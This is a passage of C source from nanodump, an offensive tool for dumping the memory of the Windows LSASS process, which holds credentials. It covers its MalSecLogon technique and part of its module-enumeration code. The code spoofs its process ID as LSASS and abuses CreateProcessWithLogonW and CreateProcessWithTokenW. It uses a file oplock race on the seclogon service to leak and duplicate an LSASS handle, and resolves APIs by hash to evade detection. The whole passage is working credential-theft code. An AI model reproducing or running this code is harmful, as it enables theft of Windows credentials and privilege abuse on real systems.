    wchar_t program_name_w[MAX_PATH];
    mbstowcs(program_name_w, program_name, MAX_PATH);
    wcsncpy(command_line, L"\"", MAX_PATH);
    wcsncat(command_line, program_name_w, MAX_PATH);
    wcsncat(command_line, L"\"", MAX_PATH);
    if (!use_malseclogon_locally)
        return;
    // dump path
    if (dump_path)
    {
        wchar_t dump_path_w[MAX_PATH];
        mbstowcs(dump_path_w, dump_path, MAX_PATH);
        wcsncat(command_line, L" -w ", MAX_PATH);
        wcsncat(command_line, dump_path_w, MAX_PATH);
    }
    // --fork
    if (fork_lsass)
        wcsncat(command_line, L" -f", MAX_PATH);
    // --snapshot
    if (snapshot_lsass)
        wcsncat(command_line, L" -s", MAX_PATH);
    // --valid
    if (use_valid_sig)
        wcsncat(command_line, L" -v", MAX_PATH);
    if (use_lsass_shtinkering)
        wcsncat(command_line, L" -sk", MAX_PATH);
    if (synchronization_file)
    {
        wcsncat(command_line, L" -sync ", MAX_PATH);
        wcsncat(command_line, synchronization_file, MAX_PATH);
    }
    // malseclogon
    wcsncat(command_line, L" -sll", MAX_PATH);
    // --stage 2
    wcsncat(command_line, L" -s2", MAX_PATH);
}

BOOL save_new_process_pid(
    IN PPROCESS_LIST process_list,
    IN DWORD pid)
{
    if (!process_list)
        return TRUE;

    if (process_list->Count + 1 > MAX_PROCESSES)
    {
        PRINT_ERR("Too many processes, please increase MAX_PROCESSES");
        return FALSE;
    }
    process_list->ProcessId[process_list->Count++] = pid;
    return TRUE;
}

// wait until the process exits and check if the dumpfile exists
BOOL check_if_succeded(
    IN DWORD new_pid,
    IN LPWSTR synchronization_file)
{
    CHAR full_path[MAX_PATH] = { 0 };
    wcstombs(full_path, synchronization_file, MAX_PATH);

    // we cannot call WaitForSingleObject on the returned handle in startInfo because the handles are duped into lsass process, we need a new handle
    HANDLE hSpoofedProcess = get_process_handle(
        new_pid,
        SYNCHRONIZE,
        FALSE,
        0);
    if (!hSpoofedProcess)
        return FALSE;

    BOOL success = wait_for_process(hSpoofedProcess);
    NtClose(hSpoofedProcess); hSpoofedProcess = NULL;
    if (!success)
        return FALSE;

    if (!file_exists(full_path))
        return FALSE;

    if (!delete_file(full_path))
        return FALSE;

    return TRUE;
}

VOID kill_created_processes(
    IN PPROCESS_LIST created_processes)
{
    if (!created_processes)
        return;

    DPRINT(
        "Killing the %ld created processes",
        created_processes->Count);
    for (DWORD i = 0; i < created_processes->Count; i++)
    {
        kill_process(
            created_processes->ProcessId[i],
            NULL);
    }
    DPRINT("The created processes have been killed");
}

/*
 * MalSecLogon can be used agains nanodump itself (writing it to disk)
 * or use a another binary (like notepad.exe) and duplicate
 * the leaked handle in order to remain fileless
 */
BOOL malseclogon_handle_leak(
    IN LPCSTR binary_path,
    IN LPCSTR dump_path,
    IN BOOL fork_lsass,
    IN BOOL snapshot_lsass,
    IN BOOL use_valid_sig,
    IN BOOL use_lsass_shtinkering,
    IN BOOL use_malseclogon_locally,
    IN DWORD lsass_pid,
    OUT PPROCESS_LIST* Pcreated_processes)
{
    PPROCESS_LIST created_processes = NULL;
    BOOL success;

    DPRINT("Using MalSecLogon to get a handle to " LSASS);
    // if MalSecLogon is used to create other processes, save their PID
    if (!use_malseclogon_locally)
    {
        created_processes = intAlloc(sizeof(PROCESS_LIST));
        if (!created_processes)
        {
            if (Pcreated_processes)
                *Pcreated_processes = NULL;
            malloc_failed();
            DPRINT_ERR("Failed to get handle to " LSASS " using MalSecLogon");
            return FALSE;
        }
    }
    if (Pcreated_processes)
        *Pcreated_processes = created_processes;
    // leak an LSASS handle using MalSecLogon
    success = malseclogon_stage_1(
        binary_path,
        dump_path,
        fork_lsass,
        snapshot_lsass,
        use_valid_sig,
        use_lsass_shtinkering,
        use_malseclogon_locally,
        lsass_pid,
        created_processes);
    if (!success)
    {
        PRINT_ERR("the --malseclogon-leak-local technique failed!");
        if (created_processes)
        {
            kill_created_processes(created_processes);
            DATA_FREE(created_processes, sizeof(PROCESS_LIST));
            if (Pcreated_processes)
                *Pcreated_processes = NULL;
        }
        return FALSE;
    }

    return TRUE;
}

VOID generate_rand_string(
    OUT LPWSTR str,
    IN DWORD size)
{
    time_t t;
    DWORD key = 0;
    DWORD start = 0;
    DWORD len_name = 15;
    DWORD i = 0;

    srand((unsigned) time(&t));

    for (start = 0; str[start] && start < size - 1; start++){}
    str[start++] = '\\';

    CHAR charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    for (i = 0; i < len_name; i++)
    {
        key = rand() % (sizeof charset - 1);
        str[start + i] = charset[key];
    }
    str[start + i] = '\x00';
}

BOOL generate_synchronization_file(
    OUT LPWSTR synchronization_file,
    IN DWORD size)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;

    success = get_env_var(
        L"Temp",
        synchronization_file,
        size);
    if (!success)
        goto cleanup;

    generate_rand_string(synchronization_file, size);

    ret_val = TRUE;

cleanup:
    return ret_val;
}

BOOL malseclogon_stage_1(
    IN LPCSTR program_name,
    IN LPCSTR dump_path,
    IN BOOL fork_lsass,
    IN BOOL snapshot_lsass,
    IN BOOL use_valid_sig,
    IN BOOL use_lsass_shtinkering,
    IN BOOL use_malseclogon_locally,
    IN DWORD lsass_pid,
    OUT PPROCESS_LIST process_list)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;
    PHANDLE_LIST handle_list = NULL;
    LPWSTR synchronization_file = NULL;
    wchar_t command_line[MAX_PATH] = { 0 };
    DWORD original_pid = 0;
    PROCESS_INFORMATION procInfo = { 0 };
    STARTUPINFOW startInfo = { 0 };
    wchar_t filename[MAX_PATH] = { 0 };
    CreateProcessWithLogonW_t CreateProcessWithLogonW = NULL;
    DWORD handles_leaked = 0;
    BOOL synchronization_file_found = FALSE;

    if (use_lsass_shtinkering || use_malseclogon_locally)
    {
        synchronization_file = intAlloc(MAX_PATH);
        if (!synchronization_file)
        {
            malloc_failed();
            goto cleanup;
        }
        success = generate_synchronization_file(
            synchronization_file,
            MAX_PATH);
        if (!success)
            goto cleanup;

        DPRINT("synchronization_file: %ls", synchronization_file);
    }

    set_command_line(
        use_malseclogon_locally,
        command_line,
        program_name,
        dump_path,
        fork_lsass,
        snapshot_lsass,
        use_valid_sig,
        use_lsass_shtinkering,
        synchronization_file);

    DPRINT("command line: %ls", command_line);

    success = find_process_handles_in_process(
        lsass_pid,
        get_lsass_min_permissions(),
        &handle_list);
    if (!success)
        goto cleanup;

    if (handle_list->Count == 0)
    {
        PRINT_ERR(
            "No handles found in " LSASS ", is the PID %ld correct?.",
            lsass_pid);
        goto cleanup;
    }

    // change our PID to the LSASS PID
    change_pid(lsass_pid, &original_pid);

    mbstowcs(filename, program_name, MAX_PATH);

    // find the address of CreateProcessWithLogonW dynamically
    CreateProcessWithLogonW = (CreateProcessWithLogonW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        CreateProcessWithLogonW_SW2_HASH,
        0);
    if (!CreateProcessWithLogonW)
    {
        api_not_found("CreateProcessWithLogonW");
        goto cleanup;
    }

    while (handles_leaked < handle_list->Count)
    {
        memset(&procInfo, 0, sizeof(PROCESS_INFORMATION));
        memset(&startInfo, 0, sizeof(STARTUPINFOW));
        startInfo.dwFlags = STARTF_USESTDHANDLES;

        startInfo.hStdInput = handle_list->Handle[handles_leaked++];

        if (handle_list->Count > handles_leaked)
            startInfo.hStdOutput = handle_list->Handle[handles_leaked++];

        if (handle_list->Count > handles_leaked)
            startInfo.hStdError = handle_list->Handle[handles_leaked++];

        success = CreateProcessWithLogonW(
            NANODUMP_USER,
            NANODUMP_DOMAIN,
            NANODUMP_PASSWD,
            LOGON_NETCREDENTIALS_ONLY,
            filename,
            command_line,
            0,
            NULL,
            NULL,
            &startInfo,
            &procInfo);
        if (procInfo.hProcess)
            NtClose(procInfo.hProcess);
        if (procInfo.hThread)
            NtClose(procInfo.hThread);
        if (!success)
        {
            function_failed("CreateProcessWithLogonW");
            goto cleanup;
        }
        DPRINT(
            "Created new process '%ls' (PID: %ld) with CreateProcessWithLogonW to leak process handles from " LSASS ": 0x%lx 0x%lx 0x%lx",
            filename,
            procInfo.dwProcessId,
            (DWORD)(ULONG_PTR)startInfo.hStdInput,
            (DWORD)(ULONG_PTR)startInfo.hStdOutput,
            (DWORD)(ULONG_PTR)startInfo.hStdError);

        // save the PID of the newly created process
        success = save_new_process_pid(process_list, procInfo.dwProcessId);
        if (!success)
            goto cleanup;

        if (synchronization_file)
        {
            success = check_if_succeded(
                procInfo.dwProcessId,
                synchronization_file);
            if (success)
            {
                synchronization_file_found = TRUE;
                break;
            }
        }
    }

    if ((use_malseclogon_locally || use_lsass_shtinkering) &&
        !synchronization_file_found)
    {
        DPRINT_ERR("The created nanodump process did not create the dump");
        goto cleanup;
    }

    if (use_lsass_shtinkering)
    {
        print_shtinkering_crash_location();
    }
    else if (use_malseclogon_locally)
    {
        print_success(dump_path, use_valid_sig, TRUE);
    }
    else
    {
        // use_malseclogon_remotely
        DPRINT(
            "Created %ld processes, trying to duplicate one of the leaked handles to " LSASS,
            process_list->Count);
    }

    ret_val = TRUE;

cleanup:
    if (synchronization_file)
    {
        DATA_FREE(synchronization_file, wcslen(synchronization_file) * sizeof(WCHAR));
    }
    if (handle_list)
    {
        DATA_FREE(handle_list, sizeof(HANDLE_LIST));
    }
    if (original_pid)
        change_pid(original_pid, NULL);

    return ret_val;
}

VOID malseclogon_trigger_lock(
    IN DWORD lsass_pid,
    IN LPWSTR cmdline,
    IN PBOOL file_lock_was_triggered)
{
    DWORD original_pid = 0;
    BOOL useCreateProcessWithToken = FALSE;
    PHANDLE_LIST handle_list = NULL;
    BOOL success = FALSE;
    PROCESS_INFORMATION procInfo = { 0 };
    CreateProcessWithTokenW_t CreateProcessWithTokenW = NULL;
    CreateProcessWithLogonW_t CreateProcessWithLogonW = NULL;
    STARTUPINFO startInfo = { 0 };

    CreateProcessWithTokenW = (CreateProcessWithTokenW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        CreateProcessWithTokenW_SW2_HASH,
        0);
    if (!CreateProcessWithTokenW)
    {
        api_not_found("CreateProcessWithTokenW");
        goto end;
    }

    CreateProcessWithLogonW = (CreateProcessWithLogonW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        CreateProcessWithLogonW_SW2_HASH,
        0);
    if (!CreateProcessWithLogonW)
    {
        api_not_found("CreateProcessWithLogonW");
        goto end;
    }

    // change our PID to the LSASS PID
    change_pid(lsass_pid, &original_pid);

    // try to enable impersonation privileges
    success = enable_impersonate_priv();
    if (success)
    {
        // find token handles within LSASS
        success = find_token_handles_in_process(
            lsass_pid,
            0,
            &handle_list);
        if (!success || !handle_list->Count)
        {
            DPRINT("No token handles found in " LSASS ", can't use CreateProcessWithToken(). Reverting to CreateProcessWithLogon()...");
            useCreateProcessWithToken = FALSE;
        }
        else
        {
            useCreateProcessWithToken = TRUE;
        }
    }
    else
    {
        DPRINT("Impersonation privileges not available, can't use CreateProcessWithToken(). Reverting to CreateProcessWithLogon()...");
        useCreateProcessWithToken = FALSE;
    }

    // printing output in from thread after this point makes no sense

    /*
     * call CreateProcessWithTokenW/CreateProcessWithLogonW so that:
     * 1) seclogon will open a handle to our spoofed PID (LSASS)
     * 2) it will try to open a handle to our target file
     * 3) our lock will trigger and pause the execution of seclogon
     * 4) we will have plenty of time to duplicate that handle
     */

    if (useCreateProcessWithToken)
    {
        for (DWORD i = 0; i < handle_list->Count; i++)
        {
            if (*file_lock_was_triggered)
                goto end;

            memset(&procInfo, 0, sizeof(PROCESS_INFORMATION));
            memset(&startInfo, 0, sizeof(STARTUPINFOW));

            success = CreateProcessWithTokenW(
                handle_list->Handle[i],
                0,
                NULL,
                cmdline,
                0,
                NULL,
                NULL,
                (LPSTARTUPINFOW)&startInfo,
                &procInfo);
            if (procInfo.hProcess)
                NtClose(procInfo.hProcess);
            if (procInfo.hThread)
                NtClose(procInfo.hThread);
            if (success)
            {
                break;
            }
        }
    }
    else
    {
        CreateProcessWithLogonW(
            NANODUMP_USER,
            NANODUMP_DOMAIN,
            NANODUMP_PASSWD,
            LOGON_NETCREDENTIALS_ONLY,
            NULL,
            cmdline,
            0,
            NULL,
            NULL,
            (LPSTARTUPINFOW)&startInfo,
            &procInfo);
        if (procInfo.hProcess)
            NtClose(procInfo.hProcess);
        if (procInfo.hThread)
            NtClose(procInfo.hThread);
    }

end:
    if (handle_list)
    {
        DATA_FREE(handle_list, sizeof(HANDLE_LIST));
    }


    // since the thread is already finishing, no need to restore our PID

    // terminate this thread
    NtTerminateThread(NULL, 0);

    return;
}

DWORD WINAPI thread_seclogon_lock(
    IN LPVOID lpParam)
{
    PTHREAD_PARAMETERS thread_params = (PTHREAD_PARAMETERS)lpParam;
    if (!thread_params)
        return 1;

    malseclogon_trigger_lock(
        thread_params->pid,
        thread_params->cmdline,
        thread_params->file_lock_was_triggered);

    return 0;
}

BOOL leak_lsass_handle_in_seclogon_with_race_condition(
    IN DWORD lsass_pid,
    OUT PHANDLE hEvent,
    OUT PHANDLE hFile)
{
    BOOL ret_val = FALSE;
    HANDLE hThread = NULL;
    OBJECT_ATTRIBUTES objAttr = { 0 };
    IO_STATUS_BLOCK IoStatusBlock = { 0 };
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    UNICODE_STRING file_to_lock = { 0 };
    file_to_lock.Buffer = L"\\??\\C:\\Windows\\System32\\license.rtf";
    file_to_lock.Length = (USHORT)wcslen(file_to_lock.Buffer) * sizeof(WCHAR);
    file_to_lock.MaximumLength = file_to_lock.Length + 2;
    THREAD_PARAMETERS thread_params = { 0 };
    OVERLAPPED overlapped = { 0 };
    REQUEST_OPLOCK_INPUT_BUFFER inputBuffer = { 0 };
    REQUEST_OPLOCK_OUTPUT_BUFFER outputBuffer = { 0 };
    inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
    inputBuffer.StructureLength = sizeof(inputBuffer);
    inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
    inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
    outputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
    outputBuffer.StructureLength = sizeof(outputBuffer);
    BOOL file_lock_was_triggered = FALSE;

    // init the object attributes
    InitializeObjectAttributes(
        &objAttr,
        &file_to_lock,
        OBJ_CASE_INSENSITIVE,
        NULL,
        NULL);

    // get a handle to the target file
    status = NtCreateFile(
        hFile,
        FILE_GENERIC_READ,
        &objAttr,
        &IoStatusBlock,
        NULL,
        FILE_ATTRIBUTE_NORMAL,
        0,
        FILE_OPEN,
        FILE_NON_DIRECTORY_FILE,
        NULL,
        0);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateFile", status);
        goto end;
    }

    DPRINT("hFile: 0x%p", *hFile);

    // create an event for synchronization
    status = NtCreateEvent(
        hEvent,
        GENERIC_ALL,
        NULL,
        SynchronizationEvent,
        FALSE);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateEvent", status);
        goto end;
    }

    DPRINT("hEvent: 0x%p", *hEvent);

    overlapped.hEvent = *hEvent;

    // create a lock on the target file
    status = _NtFsControlFile(
        *hFile,
        *hEvent,
        NULL,
        &overlapped,
        (PIO_STATUS_BLOCK)&overlapped,
        FSCTL_REQUEST_OPLOCK,
        &inputBuffer,
        sizeof(inputBuffer),
        &outputBuffer,
        sizeof(outputBuffer));
    if (status != STATUS_PENDING)
    {
        syscall_failed("NtFsControlFile", status);
        goto end;
    }

    thread_params.pid = lsass_pid;
    thread_params.cmdline = &file_to_lock.Buffer[4];
    thread_params.file_lock_was_triggered = &file_lock_was_triggered;

    /*
     * we need to run CreateProcessWithToken() in a separate thread
     * because the file lock would also lock our thread
     */
    status = NtCreateThreadEx(
        &hThread,
        THREAD_ALL_ACCESS,
        NULL,
        NtCurrentProcess(),
        thread_seclogon_lock,
        &thread_params,
        0,
        0,
        0,
        0,
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateThreadEx", status);
        goto end;
    }

    // wait until seclogon accesses the target file
    status = NtWaitForSingleObject(
        *hEvent,
        FALSE,
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtWaitForSingleObject", status);
        goto end;
    }

    // if we are here, then seclogon triggered the lock
    file_lock_was_triggered = TRUE;

    ret_val = TRUE;

    DPRINT("Seclogon thread locked. An lsass handle will be available inside the seclogon process!");

end:
    if (hThread)
        NtClose(hThread);

    return ret_val;
}

DWORD get_pid_using_file_path(
    IN LPWSTR file_path)
{
    DWORD pid = 0;
    HANDLE hFile = NULL;
    OBJECT_ATTRIBUTES objAttr = { 0 };
    IO_STATUS_BLOCK IoStatusBlock = { 0 };
    UNICODE_STRING ustr_file_path = { 0 };
    ustr_file_path.Buffer = file_path;
    ustr_file_path.Length = (USHORT)wcslen(ustr_file_path.Buffer) * sizeof(WCHAR);
    ustr_file_path.MaximumLength = ustr_file_path.Length + 2;
    PFILE_PROCESS_IDS_USING_FILE_INFORMATION pfpiufi = NULL;
    ULONG pfpiufiLen = 0;
    PULONG_PTR processIdListPtr = NULL;
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    // init the object attributes
    InitializeObjectAttributes(
        &objAttr,
        &ustr_file_path,
        OBJ_CASE_INSENSITIVE,
        NULL,
        NULL);

    status = NtCreateFile(
        &hFile,
        FILE_GENERIC_READ,
        &objAttr,
        &IoStatusBlock,
        NULL,
        FILE_ATTRIBUTE_NORMAL,
        0,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT,
        NULL,
        0);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateFile", status);
        goto end;
    }

    do
    {
        pfpiufiLen += 8192;
        pfpiufi = intAlloc(pfpiufiLen);
        if (!pfpiufi)
        {
            malloc_failed();
            goto end;
        }
        memset(&IoStatusBlock, 0, sizeof(IO_STATUS_BLOCK));
        status = NtQueryInformationFile(
            hFile,
            &IoStatusBlock,
            pfpiufi,
            pfpiufiLen,
            (FILE_INFORMATION_CLASS)FileProcessIdsUsingFileInformation);
        if (NT_SUCCESS(status))
            break;

        DATA_FREE(pfpiufi, pfpiufiLen);
    } while (status == STATUS_INFO_LENGTH_MISMATCH);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQueryInformationFile", status);
        goto end;
    }

    processIdListPtr = pfpiufi->ProcessIdList;
    // we return only the first pid, it's usually the right one
    if (pfpiufi->NumberOfProcessIdsInList >= 1)
        pid = (DWORD)*processIdListPtr;

end:
    if (hFile)
        NtClose(hFile);
    if (pfpiufi)
    {
        DATA_FREE(pfpiufi, pfpiufiLen);
    }

    return pid;
}

DWORD get_seclogon_pid(VOID)
{
    DWORD seclogon_pid = 0;
    PROCESS_INFORMATION procInfo = { 0 };
    STARTUPINFO startInfo = { 0 };
    CreateProcessWithTokenW_t CreateProcessWithTokenW = NULL;

    seclogon_pid = get_pid_using_file_path(L"\\??\\C:\\Windows\\System32\\seclogon.dll");
    if (!seclogon_pid)
    {
        DPRINT("Seclogon service not running, try to wake up");

        CreateProcessWithTokenW = (CreateProcessWithTokenW_t)(ULONG_PTR)get_function_address(
            get_library_address(ADVAPI32_DLL, TRUE),
            CreateProcessWithTokenW_SW2_HASH,
            0);
        if (!CreateProcessWithTokenW)
        {
            api_not_found("CreateProcessWithTokenW");
            return 0;
        }

        CreateProcessWithTokenW(
            NtCurrentProcess(),
            0,
            NULL,
            L"cmd",
            0,
            NULL,
            NULL,
            (LPSTARTUPINFOW)&startInfo,
            &procInfo);

        // try to get PID now
        seclogon_pid = get_pid_using_file_path(L"\\??\\C:\\Windows\\System32\\seclogon.dll");
    }

    if (procInfo.dwProcessId)
    {
        kill_process(0, procInfo.hProcess);
        NtClose(procInfo.hProcess);
        NtClose(procInfo.hThread);
    }

    return seclogon_pid;
}

HANDLE malseclogon_race_condition(
    IN DWORD lsass_pid,
    IN DWORD permissions,
    IN DWORD attributes)
{
    BOOL success = FALSE;
    HANDLE hSeclogon = NULL;
    HANDLE hDupedHandle = NULL;
    PHANDLE_LIST handle_list = NULL;
    DWORD seclogon_pid = 0;
    HANDLE hProcess = NULL;
    HANDLE hEvent = NULL;
    HANDLE hFile = NULL;
    DWORD seclogon_permissions = 0 ;
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    seclogon_pid = get_seclogon_pid();
    if (!seclogon_pid)
    {
        DPRINT_ERR("Failed to find the PID of the seclogon process");
        goto end;
    }
    DPRINT("seclogon.dll PID: %ld", seclogon_pid);

    success = leak_lsass_handle_in_seclogon_with_race_condition(
        lsass_pid,
        &hEvent,
        &hFile);
    if (!success)
        goto end;

    /*
     * these are the permissions used by seclogon
     * to open a handle to the calling process
     */
    seclogon_permissions  = 0;
    seclogon_permissions |= PROCESS_QUERY_INFORMATION;
    seclogon_permissions |= PROCESS_QUERY_LIMITED_INFORMATION;
    seclogon_permissions |= PROCESS_CREATE_PROCESS;
    seclogon_permissions |= PROCESS_DUP_HANDLE;

    // look for a handle owned by seclogon with the specified permissions
    success = find_process_handles_in_process(
        seclogon_pid,
        seclogon_permissions,
        &handle_list);
    if (!success || !handle_list->Count)
    {
        PRINT_ERR("No process handles found in seclogon. The race condition didn't work.");
        goto end;
    }

    // get a handle to seclogon
    hSeclogon = get_process_handle(
        seclogon_pid,
        PROCESS_DUP_HANDLE,
        TRUE,
        0);
    if (!hSeclogon)
    {
        PRINT_ERR("Could not open handle to seclogon");
        goto end;
    }
    // loop over each handle owned by seclogon
    for (DWORD i = 0; i < handle_list->Count; i++)
    {
        DPRINT("Testing handle %ld of %ld", i + 1, handle_list->Count);

        // duplicate the handle
        hDupedHandle = NULL;
        status = NtDuplicateObject(
            hSeclogon,
            handle_list->Handle[i],
            NtCurrentProcess(),
            &hDupedHandle,
            0,
            0,
            DUPLICATE_SAME_ACCESS);
        if (!NT_SUCCESS(status))
        {
            DPRINT("Could not duplicate handle");
            continue;
        }

        // if not lsass, continue
        if (!is_lsass(hDupedHandle))
        {
            DPRINT("The handle was not from " LSASS);
            NtClose(hDupedHandle); hDupedHandle = NULL;
            continue;
        }

        DPRINT("Found " LSASS " handle");

        /*
         * we need to elevate our lsass handle
         * so that we get the permissions we need
         */
        status = NtDuplicateObject(
            hDupedHandle,
            NtCurrentProcess(),
            NtCurrentProcess(),
            &hProcess,
            permissions,
            attributes,
            0);
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtDuplicateObject", status);
            goto end;
        }
        /*
        // duplicating the handle is a better approach
        hProcess = fork_process(
            hDupedHandle,
            attributes);
        */
    }

end:
    if (handle_list)
    {
        DATA_FREE(handle_list, sizeof(HANDLE_LIST));
    }
    if (hSeclogon)
        NtClose(hSeclogon);
    if (hDupedHandle)
        NtClose(hDupedHandle);
    if (hEvent)
        NtClose(hEvent);
    if (hFile)
        NtClose(hFile);

    return hProcess;
}

#ifdef EXE

HANDLE malseclogon_stage_2(VOID)
{
    BOOL found_handle = FALSE;
    HANDLE hProcess = NULL;
    for (DWORD leakedHandle = 4; leakedHandle <= 4 * 6; leakedHandle = leakedHandle + 4)
    {
        if (found_handle || !is_lsass((HANDLE)(ULONG_PTR)leakedHandle))
        {
            NtClose((HANDLE)(ULONG_PTR)leakedHandle);
            continue;
        }
        // found LSASS handle
        hProcess = (HANDLE)(ULONG_PTR)leakedHandle;
        // close all the other handles
        found_handle = TRUE;
    }
    return hProcess;
}
#endif

#endif


================================================
FILE: Creds-BOF/nanodump/source/modules.c
================================================
#include "modules.h"

PVOID get_peb_address(
    IN HANDLE hProcess)
{
#ifdef SSP
    UNUSED(hProcess);
    // if nanodump is running as an SSP,
    // avoid calling NtQueryInformationProcess
    return (PVOID)READ_MEMLOC(PEB_OFFSET);
#else
    PROCESS_BASIC_INFORMATION basic_info = { 0 };
    basic_info.PebBaseAddress = 0;
    PROCESSINFOCLASS ProcessInformationClass = 0;
    NTSTATUS status = NtQueryInformationProcess(
        hProcess,
        ProcessInformationClass,
        &basic_info,
        sizeof(PROCESS_BASIC_INFORMATION),
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQueryInformationProcess", status);
        DPRINT_ERR("Could not get the PEB of the process");
        return 0;
    }

    return basic_info.PebBaseAddress;
#endif
}

PVOID get_module_list_address(
    IN HANDLE hProcess,
    IN BOOL is_lsass)
{
    PVOID peb_address, ldr_pointer, ldr_address, module_list_pointer, ldr_entry_address;

    peb_address = get_peb_address(hProcess);
    if (!peb_address)
        return NULL;

    ldr_pointer = RVA(PVOID, peb_address, LDR_POINTER_OFFSET);

    ldr_address = 0;
    NTSTATUS status = NtReadVirtualMemory(
        hProcess,
        (PVOID)ldr_pointer,
        &ldr_address,
        sizeof(PVOID),
        NULL);
    if (!NT_SUCCESS(status) && !is_lsass)
    {
        // failed to read the memory of some process, simply continue
        return NULL;
    }
    if (!NT_SUCCESS(status) && is_lsass)
    {
        if (status == STATUS_ACCESS_DENIED)
        {
            PRINT_ERR("Failed to read " LSASS ", status: STATUS_ACCESS_DENIED");
        }
        else
        {
            PRINT_ERR("Failed to read " LSASS ", status: 0x%lx", status);
        }
        return NULL;
    }

    module_list_pointer = RVA(PVOID, ldr_address, MODULE_LIST_POINTER_OFFSET);

    ldr_entry_address = NULL;
    status = NtReadVirtualMemory(
        hProcess,
        (PVOID)module_list_pointer,
        &ldr_entry_address,
        sizeof(PVOID),
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtReadVirtualMemory", status);
        DPRINT_ERR("Could not get the address of the module list");
        return NULL;
    }
    DPRINT(
        "Got the address of the module list: 0x%p",
        ldr_entry_address);
    return ldr_entry_address;
}

Pmodule_info add_new_module(
    IN HANDLE hProcess,
    IN struct LDR_DATA_TABLE_ENTRY* ldr_entry)
{
    DWORD name_size;
    Pmodule_info new_module = intAlloc(sizeof(module_info));
    if (!new_module)
    {
        malloc_failed();
        DPRINT_ERR("Could not add new module");
        return NULL;
    }
    new_module->next = NULL;
    new_module->dll_base = (ULONG64)(ULONG_PTR)ldr_entry->DllBase;
    new_module->size_of_image = ldr_entry->SizeOfImage;
    new_module->TimeDateStamp = ldr_entry->TimeDateStamp;
    new_module->CheckSum = ldr_entry->CheckSum;

    name_size = ldr_entry->FullDllName.Length > sizeof(new_module->dll_name) ?
        sizeof(new_module->dll_name) : ldr_entry->FullDllName.Length;

    // read the full path of the DLL
    NTSTATUS status = NtReadVirtualMemory(
        hProcess,
        (PVOID)ldr_entry->FullDllName.Buffer,
        new_module->dll_name,
        name_size,
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtReadVirtualMemory", status);
        DPRINT_ERR("Could not add new module");
        return NULL;
    }
    return new_module;
}

BOOL read_ldr_entry(
    IN HANDLE hProcess,
    IN PVOID ldr_entry_address,
    OUT struct LDR_DATA_TABLE_ENTRY* ldr_entry,
    OUT wchar_t* base_dll_name)
{
    // read the entry
    NTSTATUS status = NtReadVirtualMemory(
        hProcess,
        ldr_entry_address,
        ldr_entry,
        sizeof(struct LDR_DATA_TABLE_ENTRY),
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtReadVirtualMemory", status);
        DPRINT_ERR(
            "Could not read module information at: 0x%p",
            ldr_entry_address);
        return FALSE;
    }
    // initialize base_dll_name with all null-bytes
    memset(base_dll_name, 0, MAX_PATH);
    // read the dll name
    status = NtReadVirtualMemory(
        hProcess,
        (PVOID)ldr_entry->BaseDllName.Buffer,
        base_dll_name,
        ldr_entry->BaseDllName.Length,
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtReadVirtualMemory", status);
        DPRINT_ERR(
            "Could not read module information at: 0x%p",
            ldr_entry->BaseDllName.Buffer);
        return FALSE;
    }
    return TRUE;
}

Pmodule_info find_modules(
    IN HANDLE hProcess,
    IN wchar_t* important_modules[],
    IN int number_of_important_modules,
    IN BOOL is_lsass)
{
    // module list
    Pmodule_info module_list = NULL;

    // find the address of LDR_DATA_TABLE_ENTRY
    PVOID ldr_entry_address = get_module_list_address(
        hProcess,
        is_lsass);
    if (!ldr_entry_address)
        return NULL;

    PVOID first_ldr_entry_address = NULL;
    SHORT dlls_found = 0;
    BOOL lsasrv_found = FALSE;
    struct LDR_DATA_TABLE_ENTRY ldr_entry;
    wchar_t base_dll_name[MAX_PATH];
    // loop over each DLL loaded, looking for the important modules
    while (dlls_found < number_of_important_modules)
    {
        // read the current entry
        BOOL success = read_ldr_entry(
            hProcess,
            ldr_entry_address,
            &ldr_entry,
            base_dll_name);
        if (!success)
            return NULL;

        if (!first_ldr_entry_address)
            first_ldr_entry_address = ldr_entry.InLoadOrderLinks.Blink;

        // loop over each important module and see if we have a match
        for (int i = 0; i < number_of_important_modules; i++)
        {
            // compare the DLLs' name, case insensitive
            if (!_wcsicmp(important_modules[i], base_dll_name))
            {
                DPRINT(
                    "Found %ls at 0x%p",
                    base_dll_name,
                    ldr_entry_address);
                // check if the DLL is 'lsasrv.dll' so that we know the process is indeed LSASS
                if (!_wcsicmp(important_modules[i], LSASRV_DLL))
                    lsasrv_found = TRUE;

                // add the new module to the linked list
                Pmodule_info new_module = add_new_module(
                    hProcess,
                    &ldr_entry);
                if (!new_module)
                    return NULL;

                if (!module_list)
                {
                    module_list = new_module;
                }
                else
                {
                    Pmodule_info last_module = module_list;
                    while (last_module->next)
                        last_module = last_module->next;
                    last_module->next = new_module;
                }
                dlls_found++;
                break;
            }
        }

        // set the next entry as the current entry
        ldr_entry_address = ldr_entry.InLoadOrderLinks.Flink;
        // if we are back at the beginning, break
